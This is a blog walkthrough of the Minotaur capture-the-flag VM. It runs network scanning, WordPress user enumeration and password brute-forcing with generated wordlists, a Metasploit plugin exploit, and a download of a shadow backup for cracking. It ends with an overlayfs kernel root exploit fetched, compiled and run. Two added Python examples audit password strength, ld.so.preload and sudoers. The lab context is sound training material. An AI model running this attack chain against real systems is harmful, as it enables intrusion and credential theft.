22 January 2021

Pentesting Fun Stuff

following the cyber security path…

SecTalks: BNE0x00 – Minotaur


Minotaur CTF
Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.
This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.


I had some trouble finding the VM in my host-only network, so I started with a horizontal scan for port 80 across the subnet.

nmap -v -O -Pn -p 80

After I found the host, I went for a vertical scan at the found host.

nmap -A -p- -T4

Port 22 (SSH), 80 (web) and 2020 (FTP) are open, and port 2020 allows anonymous FTP login. The web server had nothing of importance at first glance, and SSH was protected by authentication, so I went for the third and final option.

Anonymous FTP login

Let’s log in with the username ‘anonymous’.

ftp 2020

Well that’s not it. My options are running short. I need more information. Time to give Dirb another try, but this time with a different list.

dirb /usr/share/wordlists/dirb/big.txt

Nice. Dirb found the directory ‘bull’ and it seems it runs on wordpress. Let’s take a look.
Looks like the website runs on WordPress version 4.2.2. Time to use wpscan.

wpscan --url --enumerate u

There is the username. Now for the password. The hint in the description said I needed to generate my own wordlist, because it wasn’t on rockyou.txt. So let’s start generating wordlists.

cewl -w wordlist.txt

wpscan --url --wordlist /wordlist.txt --username bully --threads 50

Nothing. Hmmmm. The hint was clear: my list isn't sufficient, and I need to mix up the collected words more. Maybe I can find something with Google.
Not really what I was looking for, but there were an awful lot of mentions of John the Ripper. Looking at the program's options in Kali, there was an option for mangling words. With this information I changed my Google searches, and after a while I found a site with the right answer (https://www.win.tue.nl/~aeb/linux/john/john.html).

john --wordlist=wordlist.txt --rules --stdout > mangled-wordlist.txt
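The step above works because John's rules expand each base word from the site into many variants (case changes, leet substitutions, appended digits and symbols). The following is an added example, not code from the original post and not John's actual ruleset: it approximates a few such rules in Python and turns them around into a defender's check that rejects a WordPress admin password that is just a mangled version of a word scraped from the site. The base words `minotaur` and `bull` are constructed sample input.

```python
"""Approximate john-style word mangling, used as a password-policy check.

Added example: the rules here are a small, hand-picked subset that imitates what
"john --rules" does; they are not John's real rule language.
"""

# Constructed sample of what a cewl run against the site might collect.
SITE_WORDS = ["minotaur", "bull"]

LEET = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "5"}
SUFFIXES = ["", "1", "12", "123", "!", "1!", "2016"]


def mangle(word):
    """Yield common variants of one base word (case, leet, suffix)."""
    word = word.strip()
    if not word:
        return
    bases = {word.lower(), word.capitalize(), word.upper()}
    bases.add("".join(LEET.get(c, c) for c in word.lower()))
    for base in bases:
        for suffix in SUFFIXES:
            yield base + suffix
            # Reversed-word rule, another classic mangling step.
            yield base[::-1] + suffix


def mangled_wordlist(words):
    """Return the de-duplicated, sorted expansion of a list of base words."""
    variants = set()
    for w in words:
        variants.update(mangle(w))
    return sorted(variants)


def password_derived_from(password, words):
    """Return the base word a password is a mangled form of, or None.

    Intended as a policy check at password-set time: if this returns a word,
    the candidate password is only as strong as the site's own vocabulary.
    """
    for w in words:
        if password in set(mangle(w)):
            return w.strip().lower()
    return None


if __name__ == "__main__":
    expansion = mangled_wordlist(SITE_WORDS)
    print(f"{len(SITE_WORDS)} base words -> {len(expansion)} candidates")
    for candidate in ["Minotaur123", "m1n0t@ur!", "correcthorsebattery"]:
        print(candidate, "->", password_derived_from(candidate, SITE_WORDS))
```

Hooking `password_derived_from` into the password-change path (with the real cewl output as `SITE_WORDS`) is the cheap way to make sure the attack this writeup describes does not work against your own site.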

Yes! Jackpot!
Now let's get back to a vulnerability found earlier, during the first wpscan.
Time to start up Metasploit and search the database for the Slideshow Gallery exploit.
Now to get a shell and look around.
We have a flag. But it looks like there is more...

find / -print | grep -i flag.txt
/tmp/flag.txt
cat /var/www/html/flag.txt

Back to the shadow.bak file. Let’s download it and run it with John the Ripper.

meterpreter > download /tmp/shadow.bak
[*] downloading: /tmp/shadow.bak -> shadow.bak
[*] download : /tmp/shadow.bak -> shadow.bak


heffer@minotaur:/home$ cd heffer
heffer@minotaur:~$ ls
heffer@minotaur:~$ cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0


minotaur@minotaur:/home/heffer$ cd /home/minotaur
minotaur@minotaur:~$ ls
flag.txt peda
minotaur@minotaur:~$ cat flag.txt
Congrats! You’ve found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!
But can you get /root/flag.txt ?

Why yes I can!

minotaur@minotaur:~$ cat /etc/*-release
cat /etc/*-release
VERSION="14.04.2 LTS, Trusty Tahr"
PRETTY_NAME="Ubuntu 14.04.2 LTS"

So Ubuntu 14.04. That means I’m going for ‘overlayfs’ Local Root Shell (https://www.exploit-db.com/exploits/37292/).

minotaur@minotaur:~$ wget
--2016-07-29 01:36:49--
Connecting to... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: 'overlayfs.c'
100%[======================================>] 4,968 --.-K/s in 0s
2016-07-29 01:36:49 (152 MB/s) - 'overlayfs.c' saved [4968/4968]
minotaur@minotaur:~$ ls
flag.txt overlayfs.c peda
minotaur@minotaur:~$ gcc overlayfs.c -o overlayfs
minotaur@minotaur:~$ chmod 777 overlayfs
minotaur@minotaur:~$ ls
flag.txt overlayfs overlayfs.c peda
minotaur@minotaur:~$ ./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami

Woot! Now let's get the final flag.

# cd /root
# ls
flag.txt peda quotes.txt
# cat flag.txt
cat flag.txt

After trying a different approach I learned that the final flag was much simpler to obtain.
Getting root the hard way was not necessary, since user minotaur was allowed to run every program as root via sudo. But hey... it was fun anyway.
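Two things in this box are worth turning into a post-incident check: the overlayfs exploit announces itself by creating /etc/ld.so.preload (visible in the output above), and the intended route was a sudo rule that let a normal user run everything as root. The script below is an added example, not part of the original post or of the exploit: it audits the contents of an ld.so.preload file for libraries living in world-writable locations, and scans sudoers text for users granted unrestricted root. The file contents in `__main__` and the `/tmp/example-preload.so` path are constructed sample data.

```python
"""Audit helpers for two privilege-escalation artefacts seen in this writeup.

Added example, not the exploit's or the author's code. Both functions take file
contents as text so they can be run on a copied /etc/ld.so.preload or sudoers
file from a live-response bundle.
"""
import re

# A library loaded via ld.so.preload from any of these is a red flag: these
# directories are writable by unprivileged users.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
SYSTEM_LIB_PREFIXES = ("/lib", "/usr/lib")


def audit_ld_preload(contents):
    """Return a list of findings for the text of an /etc/ld.so.preload file.

    On a clean system the file normally does not exist at all, so an empty
    finding list only means the entries present are not obviously malicious.
    """
    findings = []
    for raw in contents.splitlines():
        path = raw.strip()
        if not path or path.startswith("#"):
            continue
        if path.startswith(WRITABLE_PREFIXES):
            findings.append(f"preload library in writable location: {path}")
        elif not path.startswith(SYSTEM_LIB_PREFIXES):
            findings.append(f"preload library outside system library dirs: {path}")
    return findings


# Matches the shape "<user or %group> ALL=(ALL) [NOPASSWD:] ALL" and the
# "(ALL:ALL)" variant; it deliberately ignores narrower command lists.
SUDO_ALL = re.compile(
    r"^\s*(\S+)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s*(NOPASSWD:\s*)?ALL\s*$"
)


def unrestricted_sudo_users(sudoers_text):
    """Return (principal, passwordless) pairs that may run any command as root."""
    grants = []
    for line in sudoers_text.splitlines():
        m = SUDO_ALL.match(line.split("#", 1)[0])
        if m:
            grants.append((m.group(1), m.group(2) is not None))
    return grants


if __name__ == "__main__":
    # Constructed sample contents; on a real host read the actual files.
    preload = "/tmp/example-preload.so\n"
    sudoers = (
        "root ALL=(ALL:ALL) ALL\n"
        "minotaur ALL=(ALL) NOPASSWD: ALL  # the box's intended route to root\n"
        "%admin ALL=(ALL) ALL\n"
        "backup ALL=(root) NOPASSWD: /usr/bin/rsync\n"
    )
    for finding in audit_ld_preload(preload):
        print("ld.so.preload:", finding)
    for principal, nopasswd in unrestricted_sudo_users(sudoers):
        print("sudoers:", principal, "-> full root", "(no password)" if nopasswd else "")
```

The narrow `backup` rule is deliberately not reported: the point of the sudoers check is to surface "everything as root" grants like the one on this box, which make any kernel exploit unnecessary.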
